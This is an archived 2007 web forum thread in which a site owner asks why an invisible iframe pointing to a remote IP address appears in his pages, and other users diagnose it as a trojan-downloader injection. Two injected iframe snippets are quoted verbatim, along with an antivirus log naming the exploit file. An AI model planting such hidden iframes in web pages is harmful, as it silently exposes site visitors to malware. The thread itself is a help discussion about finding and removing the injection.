View Full Version : Sorry! You IP is blocked
www.mm99.info
Jul 24th 2007, 8:30 am
Can help me why my site http://www.mm99.info and view source see this code
<iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
I dont' add that code at my site, but it show every time
I go http://81.95.145.240/go.php?sid=1 and see Sorry! You IP is blocked. ????
HuggyCT2
Jul 24th 2007, 8:33 am
Is this anything to do with your host? Maybe ask them what it is if you are sure its not in the files you have uploaded.
sachin410
Jul 24th 2007, 8:47 am
How did you discover it?
I mean I never look at source codes of my sites. :o.
Prolink
Jul 24th 2007, 10:42 am
When i visit that site my Virus Scanner (Nod32) throws up a virus warning! :mad:
Prolink
Jul 24th 2007, 10:47 am
Here what the log says
Time Module Object Name Threat Action User Information
24/07/2007 17:42:00 IMON file http://81.95.149.27/oth/ms07-017.ani a variant of Win32/TrojanDownloader.Ani.Gen trojan
webmasterjason
Jul 24th 2007, 1:05 pm
my guess is it has to do something with were you host the site, have you checked with them?
onlineravi
Jul 24th 2007, 1:08 pm
This is showing with me as well . May be your web server host might have some advertisement program in it or something like that . Directly contact your host . They will help you a lot in this matter.
sakib000
Jul 24th 2007, 1:15 pm
here is your source
www.mm99.info
Jul 24th 2007, 1:19 pm
Thanks for teach me
How can delete that code, i can't ask admin host help me :(
onlineravi
Jul 24th 2007, 1:24 pm
What do you get in when you see your template .
May be its a 4Images function . Look into any function files that might contain that particular file
sakib000
Jul 24th 2007, 1:54 pm
I am 100% sure that your host add this frame as default
kampoo
Jul 24th 2007, 2:07 pm
Hosting security protect?
www.mm99.info
Jul 24th 2007, 3:36 pm
I am 100% sure that your host add this frame as default
My hosting never add frame
Hosting security protect?
I don't think so
:(:(
www.mm99.info
Jul 25th 2007, 5:50 am
Thanks for all, today i fix it ;)
sachin410
Jul 25th 2007, 6:10 am
Thanks for all, today i fix it ;)
but where did it come from?
sakib000
Jul 25th 2007, 11:35 am
please share how did you fixed it
www.mm99.info
Jul 29th 2007, 3:43 pm
:'(
I'm upload old source...!!! and delete that source :'>
Ronmi
Aug 2nd 2007, 12:40 pm
Hello there, I come from Germany. A friend of me has several websites. He told me about virus messages people get if they visit his page. The iFrame was found in different .html and .php files. I deleted this code and the problem was fixed. I read that this code redirects the user to a site in russia. There must be a trojan hosted on the server.
sakib000
Aug 2nd 2007, 1:27 pm
can u tell us that effected website URL
Ronmi
Aug 2nd 2007, 11:56 pm
The infected Websites were basketball-portal.de and un96-basketball.de
The source code is fixed.
This code was added in .html and php files
<body bgcolor="#000000"><iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
www.mm99.info
Aug 4th 2007, 9:37 am
Yes, i'm fixed it already :D
neelesh
Aug 4th 2007, 10:56 pm
The host maybe adding it, and it is used for forced advertising. Thats suxs.
chaoz
Aug 4th 2007, 11:14 pm
sound like worm infected ur host. that usually happen :(. how u fix it btw?
www.mm99.info
Aug 7th 2007, 12:45 am
I'm upload old source...!!! and delete that erro source :'>
vBulletin® v3.6.8, Copyright ©2000-2008, Jelsoft Enterprises Ltd.